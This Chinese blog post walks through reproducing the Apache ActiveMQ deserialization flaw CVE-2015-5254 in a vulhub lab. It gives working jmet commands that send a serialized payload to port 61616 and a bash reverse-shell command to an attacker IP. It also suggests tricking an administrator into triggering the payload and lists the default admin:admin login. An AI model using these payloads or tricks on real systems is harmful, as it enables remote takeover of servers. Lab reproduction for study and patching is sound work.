[ vulhub漏洞复现篇 ] ActiveMQ反序列化漏洞复现(CVE-2015-5254)

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

文章目录

一、漏洞编号

CVE-2015-5254

二、漏洞简介

Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。
Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

三、受影响版本

Apache ActiveMQ 5.13.0之前5.x版本
https://www.cvedetails.com/cve/CVE-2015-5254/

四、ActiveMQ指纹信息

        [{
            "match": "port_contains",
            "content": "8161"
        },
        {
            "match": "server_contains",
            "content": "jetty"
        }],
        [
        {
            "match": "banner_contains",
            "content": "server:activemq"
        }],
        [
        {
            "match": "header_contains",
            "content": "realm=\"activemqrealm"
        },
        {
            "match": "banner_contains",
            "content": "magic:activemq"
        }],
        [
        {
            "match": "banner_contains",
            "content": "realm=\"activemqrealm"
        }]

五、环境搭建

vluhub漏洞靶场搭建

采用vulhub环境
切换到CVE-2015-5254目录下

cd vulhub/activemq/CVE-2015-5254

在这里插入图片描述

启动CVE-2015-5254环境

docker-compose up -d

在这里插入图片描述

查看CVE-2015-5254环境

docker-compose ps
bash
![在这里插入图片描述](https://img-blog.csdnimg.cn/9699db462bfe4235bd897c4699c2a3c4.png)

>访问CVE-2015-5254环境
```bash
http://ip:8161

在这里插入图片描述

关闭环境:
复现完毕记得关闭环境

docker-compose down

在这里插入图片描述

六、漏洞复现

环境

我攻击机用本机windows:192.168.13.1
靶机kali:192.168.13.131
下载漏洞利用工具

漏洞利用过程介绍

构造(可以使用ysoserial)可执行命令的序列化对象
作为一个消息,发送给目标61616端口
访问的Web管理页面,读取消息,触发漏洞

下载工具(jmet)

漏洞利用工具下载地址:

https://download.csdn.net/download/qq_51577576/86400301

在这里插入图片描述

使用使用jmet进行漏洞利用:

创建名称为event的队列

构造(可以使用ysoserial)可执行命令的序列化对象,作为一个消息,发送给目标61616端口。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.13.131 61616

在这里插入图片描述

查看事件是否创建成功

看到了event队列消息,说明创建成功

http://192.168.13.131:8161/admin/browse.jsp?JMSDestination=event

在这里插入图片描述

产看/tmp文件内容

查看容器

docker ps

在这里插入图片描述

进入容器

docker exec -it 150f15ae6877 /bin/bash

在这里插入图片描述

查看/tmp文件
没有success文件
在这里插入图片描述

触发命令

点击查看这条消息即可触发命令执行,此时进入容器docker-compose exec activemq bash,可见/tmp/success已成功创建,说明漏洞利用成功:

在这里插入图片描述

跳转
在这里插入图片描述

再次查看/tmp文件success文件创建成功

创建文件成功,即复现成功
在这里插入图片描述

Getshell

环境

攻击机是本机windows:192.168.13.1
靶机是kali:192.168.13.131

攻击机监听端口

 .\nc.exe  -lvvp 33333

在这里插入图片描述

靶机连接

利用工具反序列化

java -jar jmet-0.1.0-all.jar -Q 111111111111111111 -I ActiveMQ -s -Y "bash -i>&/dev/tcp/192.168.13.1/33333 0>&1" -Yp ROME 192.168.13.131   61616

在这里插入图片描述

http://192.168.13.131:8161/admin/browse.jsp?JMSDestination=111111111111111111

执行命令
在这里插入图片描述

getshell成功

在这里插入图片描述

注意:

通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。

七、X-ray

暴力破解

[Vuln: brute-force]
Target           "http://192.168.13.131:8161/admin/"
VulnType         "basic-auth/default"
username         map["field":"username" "value":"admin"]
password         map["field":"password" "value":"admin"]
from_url         "http://192.168.13.131:8161/"

存在暴力破解漏洞,理论上来说是可以跑出账号密码的。这里抛出了admin:admin的账号密码(默认密码)

存在默认用户密码

[Vuln: phantasm]
Target           "http://192.168.13.131:8161/"
VulnType         "poc-yaml-activemq-default-password/default"
links            ["https://blog.csdn.net/ge00111/article/details/72765210"]

查看links
在这里插入图片描述

ActiveMQ 默认用户名和密码
用户名:admin
密码:admin
可以在/conf/users.properties中寻找。
默认登录地址:http://localhost:8161/admin/
在这里插入图片描述
在这里插入图片描述

八、漏洞修复

打补丁,http://activemq.apache.org/security-advisories.data/CVE-2015-5254-announcement.txt
升级到最新版本
有WAF的可以配置相关规则进行拦截

九、相应资源

ActiveMQ反序列化漏洞复现CVE-2015-5254漏洞复现所利用工具jmet-0.1.0-all.jar
原文下载
vluhub漏洞靶场搭建

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注